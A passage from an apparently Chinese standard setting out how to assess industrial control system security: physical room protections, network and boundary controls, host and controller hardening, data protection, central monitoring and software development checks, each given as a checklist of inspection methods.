检查机房、中心控制室、现场控制室、现场机柜室内是否按相应安全防护技术要求设置防感应 雷措施,并查阅防雷装置验收或国家有关部门技术测试文件。 8 . 1 . 5 防火 可采用文档查阅、人工核查等方法。 内容包括: a) 核查室外控制设备的防火措施是否符合要求; b) 核查机房、中心控制室、现场控制室、现场机柜室内是否按要求设置防火设备、设施或系统,并 核查其功能是否符合要求; c) 查阅机房、中心控制室、现场控制室的内部装修材料及相关证明文件; d) 核查机房、中心控制室、现场控制室的区域划分及隔离防护情况。 8 . 1 . 6 防水和防潮 可采用人员访谈、人工核查等方法。 内容包括: a) 核查室外控制设备的防水和防潮措施是否符合要求; b) 对于拟建设和正在建设的机房、中心控制室、现场控制室,查阅建筑设计文件中是否含有防水 措施; c) 核查机房、中心控制室、现场控制室内有无给排水管道,是否按要求采取防渗漏措施; d) 核查机房、中心控制室、现场控制室是否按要求采取防雨水渗透的措施; e) 核查机房、中心控制室、现场控制室内防凝露、防地下积水等措施是否符合相应安全防护技术 要求,机房内是否存在积水情况; f) 访谈、核查机房、中心控制室、现场控制室内是否按相应安全防护技术要求安装了漏水检测报 警系统并对系统的有效性进行核查。 8 . 1 . 7 防静电 可采用文档查阅、人工核查等方法。 内容包括: a) 核查机房、各控制室、现场机柜室是否采用了防静电地板或地面; b) 核查机房、各控制室、现场机柜室设备,是否采取接地防静电措施; c) 核查室外控制设备,是否采取接地防静电措施; d) 查阅是否制定防静电产生的安全措施。 8 . 1 . 8 防爆 可采用人员访谈、文档查阅、人工核查等方法。 内容包括: a) 访谈、核查主机房、中心控制室的选址是否会受到爆炸威胁,并查阅相关防爆设计文件; b) 访谈、核查现场控制室、现场机柜室的选址是否会受到爆炸威胁,并查阅是否有相应的防爆设 计文件,是否按要求设置监测报警装置。 8 . 1 . 9 防鼠害 可采用人员访谈、人工核查等方法。 内容包括: a) 访谈、核查机房、中心控制室、现场控制室、现场机柜室的孔、洞的封堵情况; b) 访谈、核查机房、中心控制室、现场控制室、现场机柜室内的缆线防护情况。 8 . 1 . 10 温湿度控制 可采用文档查阅、人工核查等方法。 内容包括: a) 对于拟建设和正在建设的机房,查阅建筑设计文件中是否含有温、湿度控制措施内容; b) 核查中心控制室、现场控制室和现场机柜室是否按相应安全防护技术要求设置了温、湿度调节 装置,是否有温、湿度监测记录; c) 核查主机房、中心控制室、现场控制室、现场机柜室、工业控制台(柜)内温、湿度是否在要求范 围之内,查阅记录文档相关数据是否符合要求。 8 . 1 . 11 电力供应 可采用文档查阅、人工核查等方法。 内容包括: a) 对于拟建设和正在建设的机房、中心控制室,查阅建筑设计文件中是否含有稳定、可靠的电力 供应措施; b) 核查机房、中心控制室供电线路上是否采取稳压稳频和过电压保护措施; c) 核查机房、中心控制室、现场控制室、现场机柜室是否按相应安全防护技术要求配备了短期备 用电力供应装置,查阅断电情况下的持续供电时间; d) 核查机房、中心控制室电力供应短缺时,相应的应急措施是否完善。 8 . 1 . 12 电磁防护 可采用人员访谈、文档查阅、人工核查等方法。 内容包括: a) 核查机房内电源线和通信线缆是否按相应安全防护技术要求采取隔离铺设措施; b) 访谈、核查室外控制设备采取的电磁防护措施是否安全可靠; c) 核查电力电缆是否穿越中心控制室、现场控制室以及采取的相应安全防护措施; d) 查阅、核查集中存储、处理、传输敏感数据的设备是否采取电磁信息泄漏防护措施; e) 查阅、核查是否按相应安全防护技术要求对重要工艺环路涉及的设备采取有效的防止无线注 入攻击和干扰的措施; f) 查阅、核查是否按相应安全防护技术要求对涉及敏感数据的设备或区域采取防电磁干扰和敏感信息泄露的措施。 8 . 2 网络通信安全防护 8 . 2 . 1 网络架构 可采用文档查阅、人员访谈、人工核查等方法。 内容包括: a) 查阅是否绘制了与当前运行情况相符的网络拓扑结构图并定期维护更新; b) 查阅是否建有与当前情况相符的网络设备清单和核心网络设备配置文件并定期维护更新; c) 访谈、核查ICS与生产管理系统、办公系统等其他管理信息系统间是否根据数据流转路线划分 为不同的网络安全域且网络边界清晰; d) 访谈、核查ICS内部不同层次、不同业务单元间是否根据业务需求和数据流转路线划分为不同 的网络安全域并对网络区域划分的合理性进行核查; e) 核查ICS的开发、测试、运维和生产环境是否独立设置; f) 访谈、核查网络结构优先级的划分是否符合ICS业务重要性; g) 核查涉及实时控制和数据传输的 ICS是否按相应安全防护技术要求使用独立的网络设备组 网,并在物理层面上实现与其他数据网及外部公共信息网的安全隔离; h) 核查ICS内部安全域是否按相应安全防护技术要求设置网络出口; i) 核查业务终端与业务服务器之间是否通过路由控制建立安全的访问路径; j) 访谈、核查网络设备的业务处理能力是否能够按相应安全防护技术要求满足基本或业务高峰 需要; k) 访谈、检查业务宽带配置是否能够按相应安全防护技术要求保障基本业务需要、业务高峰期需 要或重要业务服务能力; l) 核查网络结构的冗余设计及通信线路、关键网络设备和关键计算设备设置情况。 8 . 2 . 2 通信传输 可采用文档查阅、人工核查、工具检测。 内容包括: a) 核查、检测ICS与组织其他信息系统、ICS不同安全域之间交换数据时是否能够对相关应用协 议进行分析,并能够发现存在的异常通信行为; b) 核查、检测ICS上下位机之间交换数据时是否能够对用户的合法性进行验证; c) 核查是否按相应安全防护技术要求部署了具有校验码或密码技术功能的设备或组件,并测试 其功能是否符合通信过程中数据的完整性要求; d) 核查是否按相应安全防护技术要求采用加密认证、加密传输等密码技术对广域网控制指令、无 线通信、敏感信息等数据传输和访问过程进行保护; e) 核查是否按相应安全防护技术要求基于硬件密码模块产生密钥并进行密码运算,并查阅相关 产品的测试报告或密码产品型号。 8 . 2 . 3 网络设备防护 可采用人工核查等方法。 内容包括: a) 核查路由器、交换机等网络设备的用户身份鉴别策略配置是否符合相应安全防护技术要求; b) 核查路由器、交换机等网络设备非法登录超限告警、登录失败处理和远程管理鉴别信息防窃取 等功能; c) 核查用户口令配置策略是否符合相应安全防护技术要求; d) 核查是否按相应安全防护技术要求对网络设备和设备用户建立唯一标识; e) 核查路由器、交换机等网络设备的管理员访问控制策略配置是否符合相应安全防护技术要求; f) 核查网络端口和服务的设置是否符合相应安全防护技术要求; g) 核查网络管理员等特权用户的操作权限设置策略是否符合相应安全防护技术要求; h) 核查组合鉴别方式是否符合相应安全防护技术要求。 8 . 2 . 4 可信验证 可采用人工核查等方法。 内容包括: a) 核查是否能够按相应安全防护技术要求对通信设备的系统引导程序、系统程序、重要配置参数 和通信应用程序等进行可信验证; b) 核查是否能够按相应安全防护技术要求对应用程序的关键环节或所有执行环节进行动态可信 验证; c) 核查是否具备检测到通信设备的可信性受到破坏后进行报警的功能; d) 核查是否将验证结果形成审计记录送至安全管理中心,是否具备动态关联感知的功能。 8 . 3 网络边界安全防护 8 . 3 . 1 安全区域划分 可采用人员访谈、人工核查等方法。 内容包括: a) 核查ICS与组织其他系统间是否具有明确的网络边界划分; b) 核查ICS内部是否按要求划分不同的安全域,并对安全域划分的合理性进行检查; c) 核查ICS的开发、测试环境是否与生产系统独立部署且物理或逻辑隔离。 8 . 3 . 2 边界隔离 可采用人工核查、工具检测等方法。 内容包括: a) 核查ICS与组织其他管理信息系统间是否按相应安全防护技术要求部署物理隔离或逻辑隔离 技术手段,并检测是否设置了合理的安全隔离策略; b) 核查ICS不同网络安全域间是否按相应安全防护技术要求部署逻辑隔离技术手段,并检测是 否设置了合理的安全隔离策略; c) 核查ICS与广域网纵向交界处是否按相应安全防护技术要求部署了边界安全隔离技术手段, 并检测是否设置了合理的安全隔离策略; d) 核查是否采用可信验证机制对接入到网络中的设备进行可信验证; e) 核查是否采用技术措施发现并阻断内部用户存在非法外联行为; f) 核查是否采用技术措施发现并阻断非授权设备接入内部网络。 8 . 3 . 3 访问控制 可采用人工核查、工具检测等方法。 内容包括: a) 核查在网络边界或区域之间是否按相应安全防护技术要求部署访问控制设备并启用访问控制 策略以及是否具有报警功能; b) 核查是否指定端口进行穿越边界的网络通信,指定端口是否配置并启用了安全策略; c) 采用非法无线网络设备定位检测、核查设备配置信息等手段核查是否存在其他未受控端口进 行穿越边界的网络通信; d) 核查不同的访问控制策略之间的逻辑关系及前后排列顺序是否合理; e) 核查访问控制策略中设定的相关配置参数是否有效; f) 核查设备的最后一条访问控制策略是否为禁用所有网络通信; g) 核查是否存在多余或无效的访问控制策略; h) 核查设备的访问控制策略中是否设定源地址、目的地址、源端口、目的端口和协议等相关配置 参数; i) 核查设备访问控制策略是否能够对进出网络的数据流实现基于应用协议和应用内容的访问 控制; j) 核查所有路由器和交换机等相关设备闲置端口是否已关闭; k) 核查身份鉴别、访问控制、加密传输等拨号访问控制措施是否符合相应安全防护技术要求并核 查拨号服务器和客户端操作系统是否进行安全加固;核查无线网络的部署方式是否单独组网 后再连接到有线网络; l) 核查无线网络是否通过受控的边界防护设备接入到内部有线网络; m) 核查物联网感知终端和接入设备的标识和身份鉴别机制; n) 核查工业控制网络内的不同区域边界的ICS专用防火墙等访问控制设备是否具备双机热备的 能力; o) 核查涉及实时控制和数据传输的ICS是否禁用拨号访问控制功能。 8 . 3 . 4 安全审计 可采用人工核查等方法。 内容包括: a) 核查是否按相应安全防护技术要求部署了安全审计系统或类似功能的系统平台; b) 查阅安全审计范围、审计内容和审计记录留存时间是否符合相应安全防护技术要求; c) 通过查阅相关记录检查是否按相应安全防护技术要求开展了审计测试工作; d) 核查是否按相应安全防护技术要求使用内部时钟为审计记录生成时间戳; e) 核查审计失败、审计阈值突破等异常事件的告警处置功能是否符合相应安全防护技术要求; f) 核查是否按相应安全防护技术要求采取防止因审计行为而造成业务中断、限制非授权用户远 程访问审计记录等保护措施; g) 核查是否按相应安全防护技术要求具备集中审计功能,审计数据生成与分析、审计记录访问等 是否符合要求; h) 核查是否按相应安全防护技术要求具备审计工具和进程保护能力。 8 . 3 . 5 入侵防范 可采用文档查阅、人工核查、工具检测等方法。 内容包括: a) 核查是否在网络和区域边界部署入侵防护措施; b) 核查相关系统或组件的配置信息或安全策略是否有效并能覆盖网络所有关键节点; c) 核查是否按相应安全防护技术要求在路由器、交换机等关键网络节点处采取监测网络入侵行 为的措施; d) 核查、检测相关系统或组件是否能够按相应安全防护技术要求检测到从外部发起的网络攻击 行为并报警; e) 核查、检测相关系统或组件是否能够按相应安全防护技术要求检测到从内部发起的网络攻击 行为并报警; f) 核查入侵检测技术是否能够按相应安全防护技术要求识别、分析工业控制协议,是否能够识别 异常信息并告警; g) 核查是否能够按相应安全防护技术要求检测和分析各类网络和异常攻击行为、记录相关信息 并具备告警和处置功能; h) 核查是否部署相关系统或组件对 APT等新型网络攻击行为进行检测和分析; i) 查阅相关系统或组件的记录是否按相应安全防护技术要求涵盖攻击源网路地址、攻击类型、攻击目标、攻击时间等相关内容; j) 核查相关系统或组件的规则库版本或威胁情报库是否已经更新到最新版本。 8 . 3 . 6 恶意代码防范 可采用人工核查等方法。 内容包括: a) 核查是否在关键网络节点处采取恶意代码检测与清除的措施; b) 核查检测恶意代码种类的能力是否满足ICS运行要求; c) 核查是否能够维护恶意代码库的升级和检测系统的更新但不会对业务流量数据的正常传输造 成影响; d) 核查是否搭建了测试环境并能够准确检测恶意代码库升级后对系统的影响; e) 核查是否能够进行恶意软件的追踪溯源; f) 核查是否能够按相应安全防护技术要求检测和分析各类恶意代码、记录相关信息并发送至安 全管理中心。 8 . 3 . 7 可信验证 可采用人工核查等方法。 内容包括: a) 核查是否能够按相应安全防护技术要求对边界设备的系统引导程序、系统程序、重要配置参数 和通信应用程序等进行可信验证; b) 核查是否能够按相应安全防护技术要求对应用程序的关键环节或所有执行环节进行动态可信 验证; c) 核查是否具备检测到边界设备的可信性受到破坏后进行报警的功能; d) 核查是否能够按相应安全防护技术要求将验证结果形成审计记录送至安全管理中心并进行动 态关联感知。 8 . 4 工业主机安全防护 8 . 4 . 1 身份鉴别 可采用人工核查、工具检测等方法。 内容包括: a) 核查是否能够提供专用的登录控制模块(或在组态软件中)对登录用户进行身份标识和鉴别; b) 核查对登录用户的身份鉴别技术是否符合相应安全防护技术要求; c) 核查是否能够保证用户身份标识的唯一性; d) 核查登录口令设置复杂度和更换周期是否符合要求; e) 核查是否具备登录失败处理功能; f) 核查是否不存在默认账户或默认口令; g) 核查对服务器进行远程管理的接入方式是否符合要求; h) 核查组合鉴别方式是否符合相应安全防护技术要求。 8 . 4 . 2 访问控制 可采用人工核查、工具检测等方法。 内容包括: a) 核查是否能够按相应安全防护技术要求部署访问控制策略; b) 核查访问控制策略的覆盖范围是否涵盖与资源访问相关的主体、客体及访问关系; c) 检查是否对远程访问和远程运维行为部署访问控制策略; d) 核查主机访问日志和操作过程安全审计等安全措施实施情况; e) 核查工业主机上外设接口的控制措施; f) 检查是否能够按相应安全防护技术要求对敏感信息、主体、客体等设置安全标记并建立基于访问行为白名单的访问控制机制; g) 核查访问控制机制是否影响ICS正常运行。 8 . 4 . 3 安全审计 可采用人工核查、工具检测等方法。 内容包括: a) 核查是否按相应安全防护技术要求提供专用的审计模块; b) 核查审计范围是否符合相应安全防护技术要求; c) 核查审计内容是否符合相应安全防护技术要求; d) 核查审计记录的产生、内容和留存等是否符合相应安全防护技术要求; e) 对审计进程和审计记录的保护措施的有效性进行核查; f) 核查是否能够按相应安全防护技术要求实现集中审计。 8 . 4 . 4 入侵防范 可采用人工核查、工具检测等方法。 内容包括: a) 核查操作系统和运行程序的安装是否遵循了最小安装原则; b) 通过查阅相关记录检查安全控制措施安装前是否在离线环境中进行安全性和兼容性测试; c) 核查是否能够按要求配置应用程序白名单等入侵防护策略; d) 通过查阅日常文档记录或入侵防护设备日志核查是否能够按相应安全防护技术要求实现对入 侵攻击行为的检测、记录和报警; e) 核查入侵防护日志备份情况是否符合要求; f) 核查工业主机防火墙是否开启,策略配置是否满足ICS业务要求; g) 核查入侵防护机制是否不影响ICS的正常运行。 8 . 4 . 5 恶意代码防范 可采用文档查阅、人工核查、工具检测等方法。 内容包括: a) 核查是否对工业主机采取恶意代码检测与清除的措施,并通过查阅记录文档或操作日志进行 验证; b) 查阅防恶意代码软件或应用程序白名单软件在离线或测试环境中进行安全性和兼容性测试的 技术报告,并评估其是否影响ICS正常运行; c) 核查是否部署对移动存储设备和网络接收文件和邮件接收前进行病毒查杀的措施,并对其有 效性进行评估; d) 核查是否搭建了离线环境并能够测试恶意代码库升级后对系统的影响; e) 核查是否能够维护恶意代码库的升级和检测系统的更新且不会影响业务流量数据的正常 传输; f) 核查恶意代码库的管理是否符合相应安全防护技术的要求; g) 核查是否能够进行恶意软件的追踪溯源; h) 核查是否能够按相应安全防护技术要求部署了免受恶意代码攻击的技术措施或主动免疫可信 验证机制; i) 对入侵和病毒行为的阻断功能的有效性进行核查。 8 . 4 . 6 漏洞防范 可采用文档查阅、人工核查、工具检测等方法。 内容包括: a) 查阅组织印发的重大ICS安全漏洞和可能影响ICS安全的主机软硬件漏洞的风险通报及补丁升级通知,检查组织是否密切关注重大ICS安全漏洞及补丁发布; b) 检测工业主机是否存在高危漏洞; c) 查阅组织ICS安全漏洞补丁升级记录,核查组织工业主机是否已安装最新版补丁程序; d) 查阅组织补丁安装前进行安全测试的相关证明材料(如安全测试方案、测试报告等),评估其是 否进行补丁安全性测试; e) 核查是否存在无法通过补丁更新或更改配置的方式解决处理的工业主机漏洞隐患,并核查相 应的解决方案是否符合要求。 8 . 4 . 7 移动存储媒体防护 可采用人员访谈、文档查阅、人工核查、工具检测等方法。 内容包括: a) 核查工业主机是否存在移动存储媒体等外设接口使用痕迹,核查是否有未授权的外设终端接 入记录; b) 访谈、查阅组织主机外设接口管理制度,并评估是否落实了工业主机外设安全管理技术手段; c) 核查是否按相应安全防护技术要求对外接移动设备部署可信标识和认证的技术手段; d) 核查是否按相应安全防护技术要求建立可信标识与用户角色和权限的对应机制。 8 . 4 . 8 剩余信息保护 可采用文档查阅、工具检测等方法。 内容包括: a) 通过查阅相关记录检查配置信息、系统设计文档、数据库记录等资源所在的硬盘或存储空间是 否按相应安全防护技术的要求再被释放或重新分配前进行清除; b) 对存储于磁盘中的文件进行恢复测试,并通过对比数据核实剩余信息是否已被彻底清除。 8 . 4 . 9 资源控制 可采用文档查阅、人工核查、工具检测等方法。 内容包括: a) 核查是否按相应安全防护技术要求部署系统资源控制的措施,如检查配置参数是否设置最大 进程数等; b) 通过查阅产品(应用)测试结果或检查数据库表空间,检查系统资源利用率是否在允许范围内 或总体数据库表空间占用率低于阈值; c) 核查是否按相应安全防护技术要求部署针对数据库资源占用过大用户的限制措施; d) 核查是否按相应安全防护技术要求限制终端登录; e) 核查、检测是否按相应安全防护技术要求部署对重要节点的系统服务器中央处理器、硬盘、内 存和网络等资源进行监视的措施(包括通过第三方工具或增强功能实现); f) 检查、检测是否按相应安全防护技术要求部署当系统的服务水平降低到预先规定的最小值时 进行报警的措施(包括通过第三方工具或增强功能实现)。 8 . 4 . 10 可信验证 可采用人工核查、工具检测等方法。 内容包括: a) 核查是否能够按相应安全防护技术要求基于可信根对计算设备的系统引导程序、系统程序、重 要配置参数和通信应用程序等进行可信验证; b) 核查是否能够按相应安全防护技术要求对应用程序的关键环节或所有执行环节进行动态可信 验证; c) 对是否具备检测到计算设备的可信性受到破坏后进行报警功能进行核查; d) 对是否能够按相应安全防护技术要求将验证结果形成审计记录送至安全管理中心并进行动态关联感知的功能进行核查。 8 . 5 控制设备安全防护 8 . 5 . 1 身份鉴别 可采用人工核查等方法。 内容包括: a) 按 8 . 4 . 1的方法对设备身份鉴别措施的部署情况进行核查; b) 对设备无法部署身份鉴别措施的真实性进行核查,并核查是否在上位控制或管理设备上实现 同等功能或通过管理手段控制。 8 . 5 . 2 访问控制 可采用人工核查等方法。 内容包括: a) 按 8 . 4 . 2的方法对设备访问控制措施的部署情况进行核查、检测; b) 核查是否对所有操作、管理活动采取会话锁定措施; c) 对设备无法部署访问控制措施的真实性进行核查,并核查是否在上位控制或管理设备上实现 同等功能或通过管理手段控制。 8 . 5 . 3 安全审计 可采用人工核查等方法。 内容包括: a) 按 8 . 4 . 3的方法对设备安全审计措施的部署情况进行核查; b) 对设备无法部署安全审计措施的真实性进行核查,并核查是否在上位控制或管理设备上实现 同等功能或通过管理手段控制。 8 . 5 . 4 入侵防范 可采用人工核查等方法。 内容包括: a) 按 8 . 4 . 4的方法对设备入侵防范措施的部署情况进行核查; b) 如核心控制设备前端部署了串接类的防护设备,核查是否具备旁路功能; c) 如核心控制设备前端部署了串接类的防护设备,对其协议解析、过滤、阻断等功能进行核查; d) 对设备无法部署入侵防范措施的真实性进行核查,并核查是否在上位控制或管理设备上实现 同等功能或通过管理手段控制。 8 . 5 . 5 恶意代码防范 可采用文档查阅、人工核查等方法。 内容包括: a) 按 8 . 4 . 5的方法对设备恶意代码防范措施的部署情况进行核查; b) 通过查阅设备上线前安全性检测报告检查是否能够保证设备固件中不存在恶意代码程序; c) 核查是否对设备的可执行程序、静态库、动态库配置了白名单安全防护措施; d) 核查是否对关键上位机 HMI的外部物理接口部署了启用和禁用控制措施,并核查是否能够 对接入行为生成使用记录; e) 对设备无法部署恶意代码防范措施的真实性进行核查,并核查是否在上位控制或管理设备上 实现同等功能或通过管理手段控制。 8 . 5 . 6 软件容错 可采用人员访谈、文档查阅、人工核查等方法。 内容包括: a) 查阅系统设计文档的内容是否包括数据有效性校验功能的内容或模块; b) 对 HMI或通信接口输入内容所采取的有效性校验措施进行核查; c) 通过查阅应用系统设计文档和维护文档,核查故障发生时应用系统是否能继续提供 一 部分功 能,并能够实施必要的措施; d) 通过查阅应用系统设计文档和维护文档,核查故障发生时应用系统是否能够保证系统功能 恢复; e) 通过人员访谈或查阅相关文档记录判断软件容错措施是否能够保障业务需求。 8 . 5 . 7 漏洞防范 可采用文档查阅、人工核查等方法。 内容包括: a) 查阅组织印发的控制设备漏洞风险通报及补丁升级通知,检查组织是否及时密切关注重大 ICS安全漏洞并及时采取应对措施; b) 查阅组织ICS安全漏洞补丁升级记录,核查组织工业控制设备是否已安装最新版补丁程序; c) 查阅组织补丁安装前进行安全测试的相关证明材料(如安全测试方案、测试报告等),评估其是 否进行补丁安全性测试; d) 核查是否存在无法通过补丁更新或更改配置的方式解决处理的设备漏洞隐患,并核查相应的 解决方案是否符合要求。 8 . 5 . 8 资源控制 可采用人工核查等方法。 内容包括: a) 核查是否采取设定终端接入方式、网络地址范围等限制终端登录措施; b) 检查应用系统配置信息是否对最大并发会话连接数进行限制; c) 核查中间件配置信息是否对最大并发会话连接数进行限制; d) 核查应用系统通信双方中一方在一段时间内未做任何响应时另一方是否能够自动结束会话; e) 核查是否能够正确地限制单个账户的多重并发会话数。 8 . 6 数据安全防护 8 . 6 . 1 数据采集 可采用文档查阅、人工核查等方法。 内容包括: a) 通过查阅组织数据管理相关文档材料,评估其是否建立数据采集目的、用途、获取源和频度等 目录和清单; b) 核查是否对数据采集环境、设施和技术采取必要的安全管控措施。 8 . 6 . 2 数据传输 可采用文档查阅、人工核查、工具检测等方法。 内容包括: a) 通过查阅系统设计文档,检查鉴别数据、重要业务数据、重要审计数据和重要配置数据等在传 输过程中是否按相应安全防护技术要求采用了完整性校验或符合国家密码主管部门核准的密 码技术保证完整性; b) 按相应安全防护技术要求,通过核查加密认证设备、路由器、交换机和防火墙等提供访问控制 功能的设备,评估ICS内使用广域网进行控制指令或相关数据交换过程中是否采用加密认证 技术手段实现身份鉴别、访问控制和数据加密传输; c) 通过查阅系统设计文档,检查鉴别数据、重要业务数据、重要审计数据和重要配置数据等在传输过程中是否按相应安全防护技术要求采用密码技术保证保密性; d) 通过嗅探等方式抓取传输过程中的数据包,核查鉴别数据、重要业务数据、重要审计数据和重 要配置数据等在传输过程中是否按相应安全防护技术要求进行了加密处理; e) 通过查阅设计文档,检查是否按相应安全防护技术要求采用密码技术保证数据发送和数据接 收操作的不可抵赖性,检查是否采取技术措施保证数据发送和数据接收操作的不可抵赖性,测 试是否能够检测到数据在传输过程中被篡改。 8 . 6 . 3 数据存储 可采用文档查阅、人工核查、工具检测等方法。 内容包括: a) 核查是否按相应安全防护技术要求对存储媒体及存储媒体中的数据进行保护; b) 核查是否按相应安全防护技术要求对测试数据采取签订保密协议、回收测试数据等保护性 措施; c) 通过查阅设计文档,核查是否按相应安全防护等级要求,采用校验技术或密码技术保证鉴别数 据、重要业务数据、重要审计数据和重要配置数据等在存储过程中的完整性; d) 核查在存储过程中如对鉴别数据、重要业务数据、重要审计数据和重要配置数据等进行篡改, 是否能够检测到数据的完整性受到破坏并能够及时恢复; e) 通过人工核查或工具检测等方式,核查是否能够对鉴别数据、重要业务数据、重要审计数据和 重要配置数据等重要工业数据进行加密存储,评估其能否符合对存储数据的安全防护要求。 8 . 6 . 4 数据应用 可采用文档查阅、人员访谈、工具检测等方法。 内容包括: a) 按相应安全防护等级要求,采用人员访谈、查阅文档等方式,检查敏感数据的范围界定和脱敏 处理等管理过程是否完善,并评估是否符合敏感数据脱敏处理安全审计要求; b) 按相应安全防护等级要求,采取人员访谈等方式,评估是否使用实际生产数据等敏感数据进行 测试;如存在敏感数据测试情况,应以人员访谈、工具检测等方式,评估测试数据是否去除所有 敏感内容; c) 按相应安全防护等级要求,核查是否采取测试数据保护措施,并评估是否能够杜绝未授权获取 及使用测试数据。 8 . 6 . 5 数据备份恢复 可采用文档查阅、人工核查等方法。 内容包括: a) 核查关键业务备份数据、数据备份日志文件,评估其是否对关键业务数据进行了定期备份; b) 核查数据备份方式、备份周期等策略是否符合相应安全防护技术的要求; c) 查阅相关恢复测试记录文档,评估是否定期开展恢复测试,并判断恢复测试的有效性; d) 核查是否部署重要存储媒体异地备份功能,并评估部署方式是否与本地备份相同; e) 核查是否部署数据处理系统的热冗余并对其可用性进行评估; f) 核查是否部署异地灾难备份中心并评估其功能是否符合要求; g) 核查灾难恢复能力指标 RTO、RPO是否符合要求。 8 . 6 . 6 用户信息保护 可采用文档查阅、人工核查等方法。 内容包括: a) 核查采集的用户信息是否是业务应用必需的; b) 核查是否采取技术措施限制对用户信息的访问和使用; c) 查阅是否制定了保护用户信息的管理制度和流程。 8 . 6 . 7 剩余信息保护 可采用文档查阅等方法。 内容包括: a) 通过查阅相关配置信息或系统设计文档,检查鉴别信息所在的存储空间被释放或重新分配前 是否得到彻底清除; b) 通过查阅相关配置信息或系统设计文档,检查敏感数据所在的存储空间被释放或重新分配给 其他用户前是否得到彻底清除。 8 . 6 . 8 数据销毁 可采用人员访谈、文档查阅、工具检测等方法。 内容包括: a) 采用人员访谈和查阅存储媒体销毁记录等方式,检查是否按相应安全防护技术要求销毁数据 存储媒体; b) 采用技术手段对销毁的数据进行恢复测试,并通过比对数据样本核实重要数据是否彻底清除。 8 . 7 防护产品安全 8 . 7 . 1 标识与鉴别 可采用人工核查等方法。 内容包括: a) 通过查看配置策略核查是否对用户部署了符合要求的身份标识与鉴别机制; b) 通过查看配置策略检查是否对管理员用户部署了与相应安全防护技术要求相符合的安全策 略,包括:管理员的安全属性、身份鉴别方式和登录限制机制等。 8 . 7 . 2 用户数据保护 可采用人工核查等方法。 内容包括: a) 通过查看配置策略核查是否能够基于安全属性实施相应的访问控制功能; b) 通过查看配置策略核查实施的访问控制功能能否对控制端访问用户身份进行有效、正确的 验证; c) 核查是否具备用户数据所在的存储空间被释放或重新分配前得以彻底清除的功能。 8 . 7 . 3 安全管理 可采用人工核查等方法。 内容包括: a) 通过查阅配置策略核查是否对管理员部署了符合要求的口令鉴别和身份鉴别等安全机制并进 行测试检查; b) 核查是否向授权管理员提供了符合要求的管理功能。 8 . 7 . 4 管理信息保护 可采用文档查阅、人工核查等方法。 内容包括: a) 通过查阅产品的认证信息核查是否能实现管理信息的加密传输,并对是否存在未授权泄露风 险进行评估; b) 核查是否在远程管理主机上采用具有保密措施的远程管理方式读取和设置产品的配置信息, 并对是否存在未授权泄露风险进行评估; c) 查阅相关防护产品的安全功能测试报告是否经过国家有关机构的认证。 8 . 8 系统集中管控 8 . 8 . 1 集中安全管理 可采用人工核查等方法。 内容包括: a) 通过查看配置策略核查是否对系统管理员按相应安全防护技术要求部署了身份鉴别和行为审 计等访问控制措施,并对措施的有效性进行测试评估; b) 核查是否通过系统管理员对系统的资源和运行进行配置、控制和管理; c) 通过查看配置策略核查是否按相应安全防护技术要求对审计管理员部署了身份鉴别和行为审 计等访问控制措施,并对措施的有效性进行测试评估; d) 核查是否按相应安全防护技术要求通过审计管理员对审计记录进行分析处理; e) 通过查看配置策略核查是否按相应安全防护技术要求对安全管理员部署了身份鉴别和行为审 计等访问控制措施,并对措施的有效性进行测试评估; f) 核查是否按相应安全防护技术要求通过安全管理员对系统中的主体、客体进行统一标记、主体 授权以及策略配置,并对数据完整性进行校验。 8 . 8 . 2 集中安全监控 可采用人工核查等方法。 内容包括: a) 核查是否按相应安全防护技术要求划分单独的网络区域以用于集中部署安全设备或安全 组件; b) 核查是否按相应安全防护技术要求使用独立的带外管理网络和 SSH、HTTPS、IPSecVPN等 安全方式对安全设备或安全组件进行管理; c) 核查是否按相应安全防护技术要求部署了具备运行状态监测功能的系统或设备,能够对网络 链路、安全设备、网络设备和服务器等的运行状况进行集中监测; d) 核查运行状态监测系统是否按相应安全防护技术要求,根据网络链路、安全设备、网络设备和 服务器等的工作状态以及设定的阈值(或默认阈值)实时报警; e) 核查是否能够按相应安全防护技术要求对安全策略(如防火墙访问控制策略、入侵保护系统防 护策略、WAF安全防护策略等)进行集中管理; f) 核查安全管理中心是否能按相应安全防护技术要求呈现ICS设备间的访问关系并形成基于网 络访问关系、业务操作指令的工业控制环境的行为白名单,实现基于白名单的访问控制; g) 核查是否能按相应安全防护技术要求对工业控制现场控制设备、信息安全设备、网络设备、服 务器、操作站等设备中的主体和客体进行登记; h) 核查是否能按相应安全防护技术要求对各类信息安全报警和日志信息进行关联分析,是否能 提取出少量或概括性的重要安全事件或发掘隐藏的攻击规律,并是否能够对存在类似风险的 系统进行安全预警; i) 核查是否按相应安全防护技术要求对操作系统防恶意代码系统及网络恶意代码防护设备的集 中管理,并对防恶意代码病毒规则库的升级进行集中管理; j) 核查是否按相应安全防护技术要求实现对各个系统或设备的补丁升级进行集中管理; k) 核查是否能按相应安全防护技术要求,对网络中发生的网络攻击和异常行为等各类安全事件 进行集中识别、报警、分析,并具备与ICS统一报警、日志呈现的功能; l) 核查是否按相应安全防护技术要求在系统范围内统一使用了唯一确定的时钟源。 8 . 8 . 3 集中安全审计 可采用文档查阅、人工核查等方法。 内容包括: a) 核查是否按相应安全防护技术要求部署统 一 的集中安全审计系统,统 一 收集和存储各设备审 计数据; b) 核查集中安全审计系统是否具备对审计记录的分类存储、按需审计和管理查询等功能; c) 核查各设备是否按相应安全防护技术要求配置并启用了相关策略,将审计数据发送到独立于 设备自身的外部集中安全审计系统中; d) 查阅审计记录的留存时间是否至少为六个月。 8 . 9 软件开发安全防护 8 . 9 . 1 自行软件开发 可采用文档查阅、人工核查等方法。 内容包括: a) 核查是否按相应安全防护保障要求在独立的物理环境中完成编码和测试,并检查测试数据和 结果是否处于受控状态; b) 查阅是否按相应安全防护保障要求提供软件安全测试报告和代码审计报告; c) 查阅是否编制软件设计文档和使用指南; d) 检查是否按相应安全防护保障要求建立了代码编写安全规范并参照执行; e) 核查开发人员是否由专职人员担任且其活动是否受到控制、监视和审查。 8 . 9 . 2 外包软件开发 可采用文档查阅等方法。 内容包括: a) 查阅软件交付前进行恶意代码检测的报告; b) 查阅外包软件第三方检测报告; c) 查阅安全测试报告是否包含密码应用安全性测试相关内容。 8 . 9 . 3 软件测试验收 可采用文档查阅等方法。 内容包括: a) 查阅软件测试验收方案和测试验收报告; b) 查阅软件上线前的安全测试报告。 8 . 10 系统维护安全防护 8 . 10 . 1 设备维护 可采用人员访谈、文档查阅等方法。 内容包括: a) 查阅是否对终端计算机、工作站、便携式计算机、系统设备、网络设备和安全防护设备等关键设 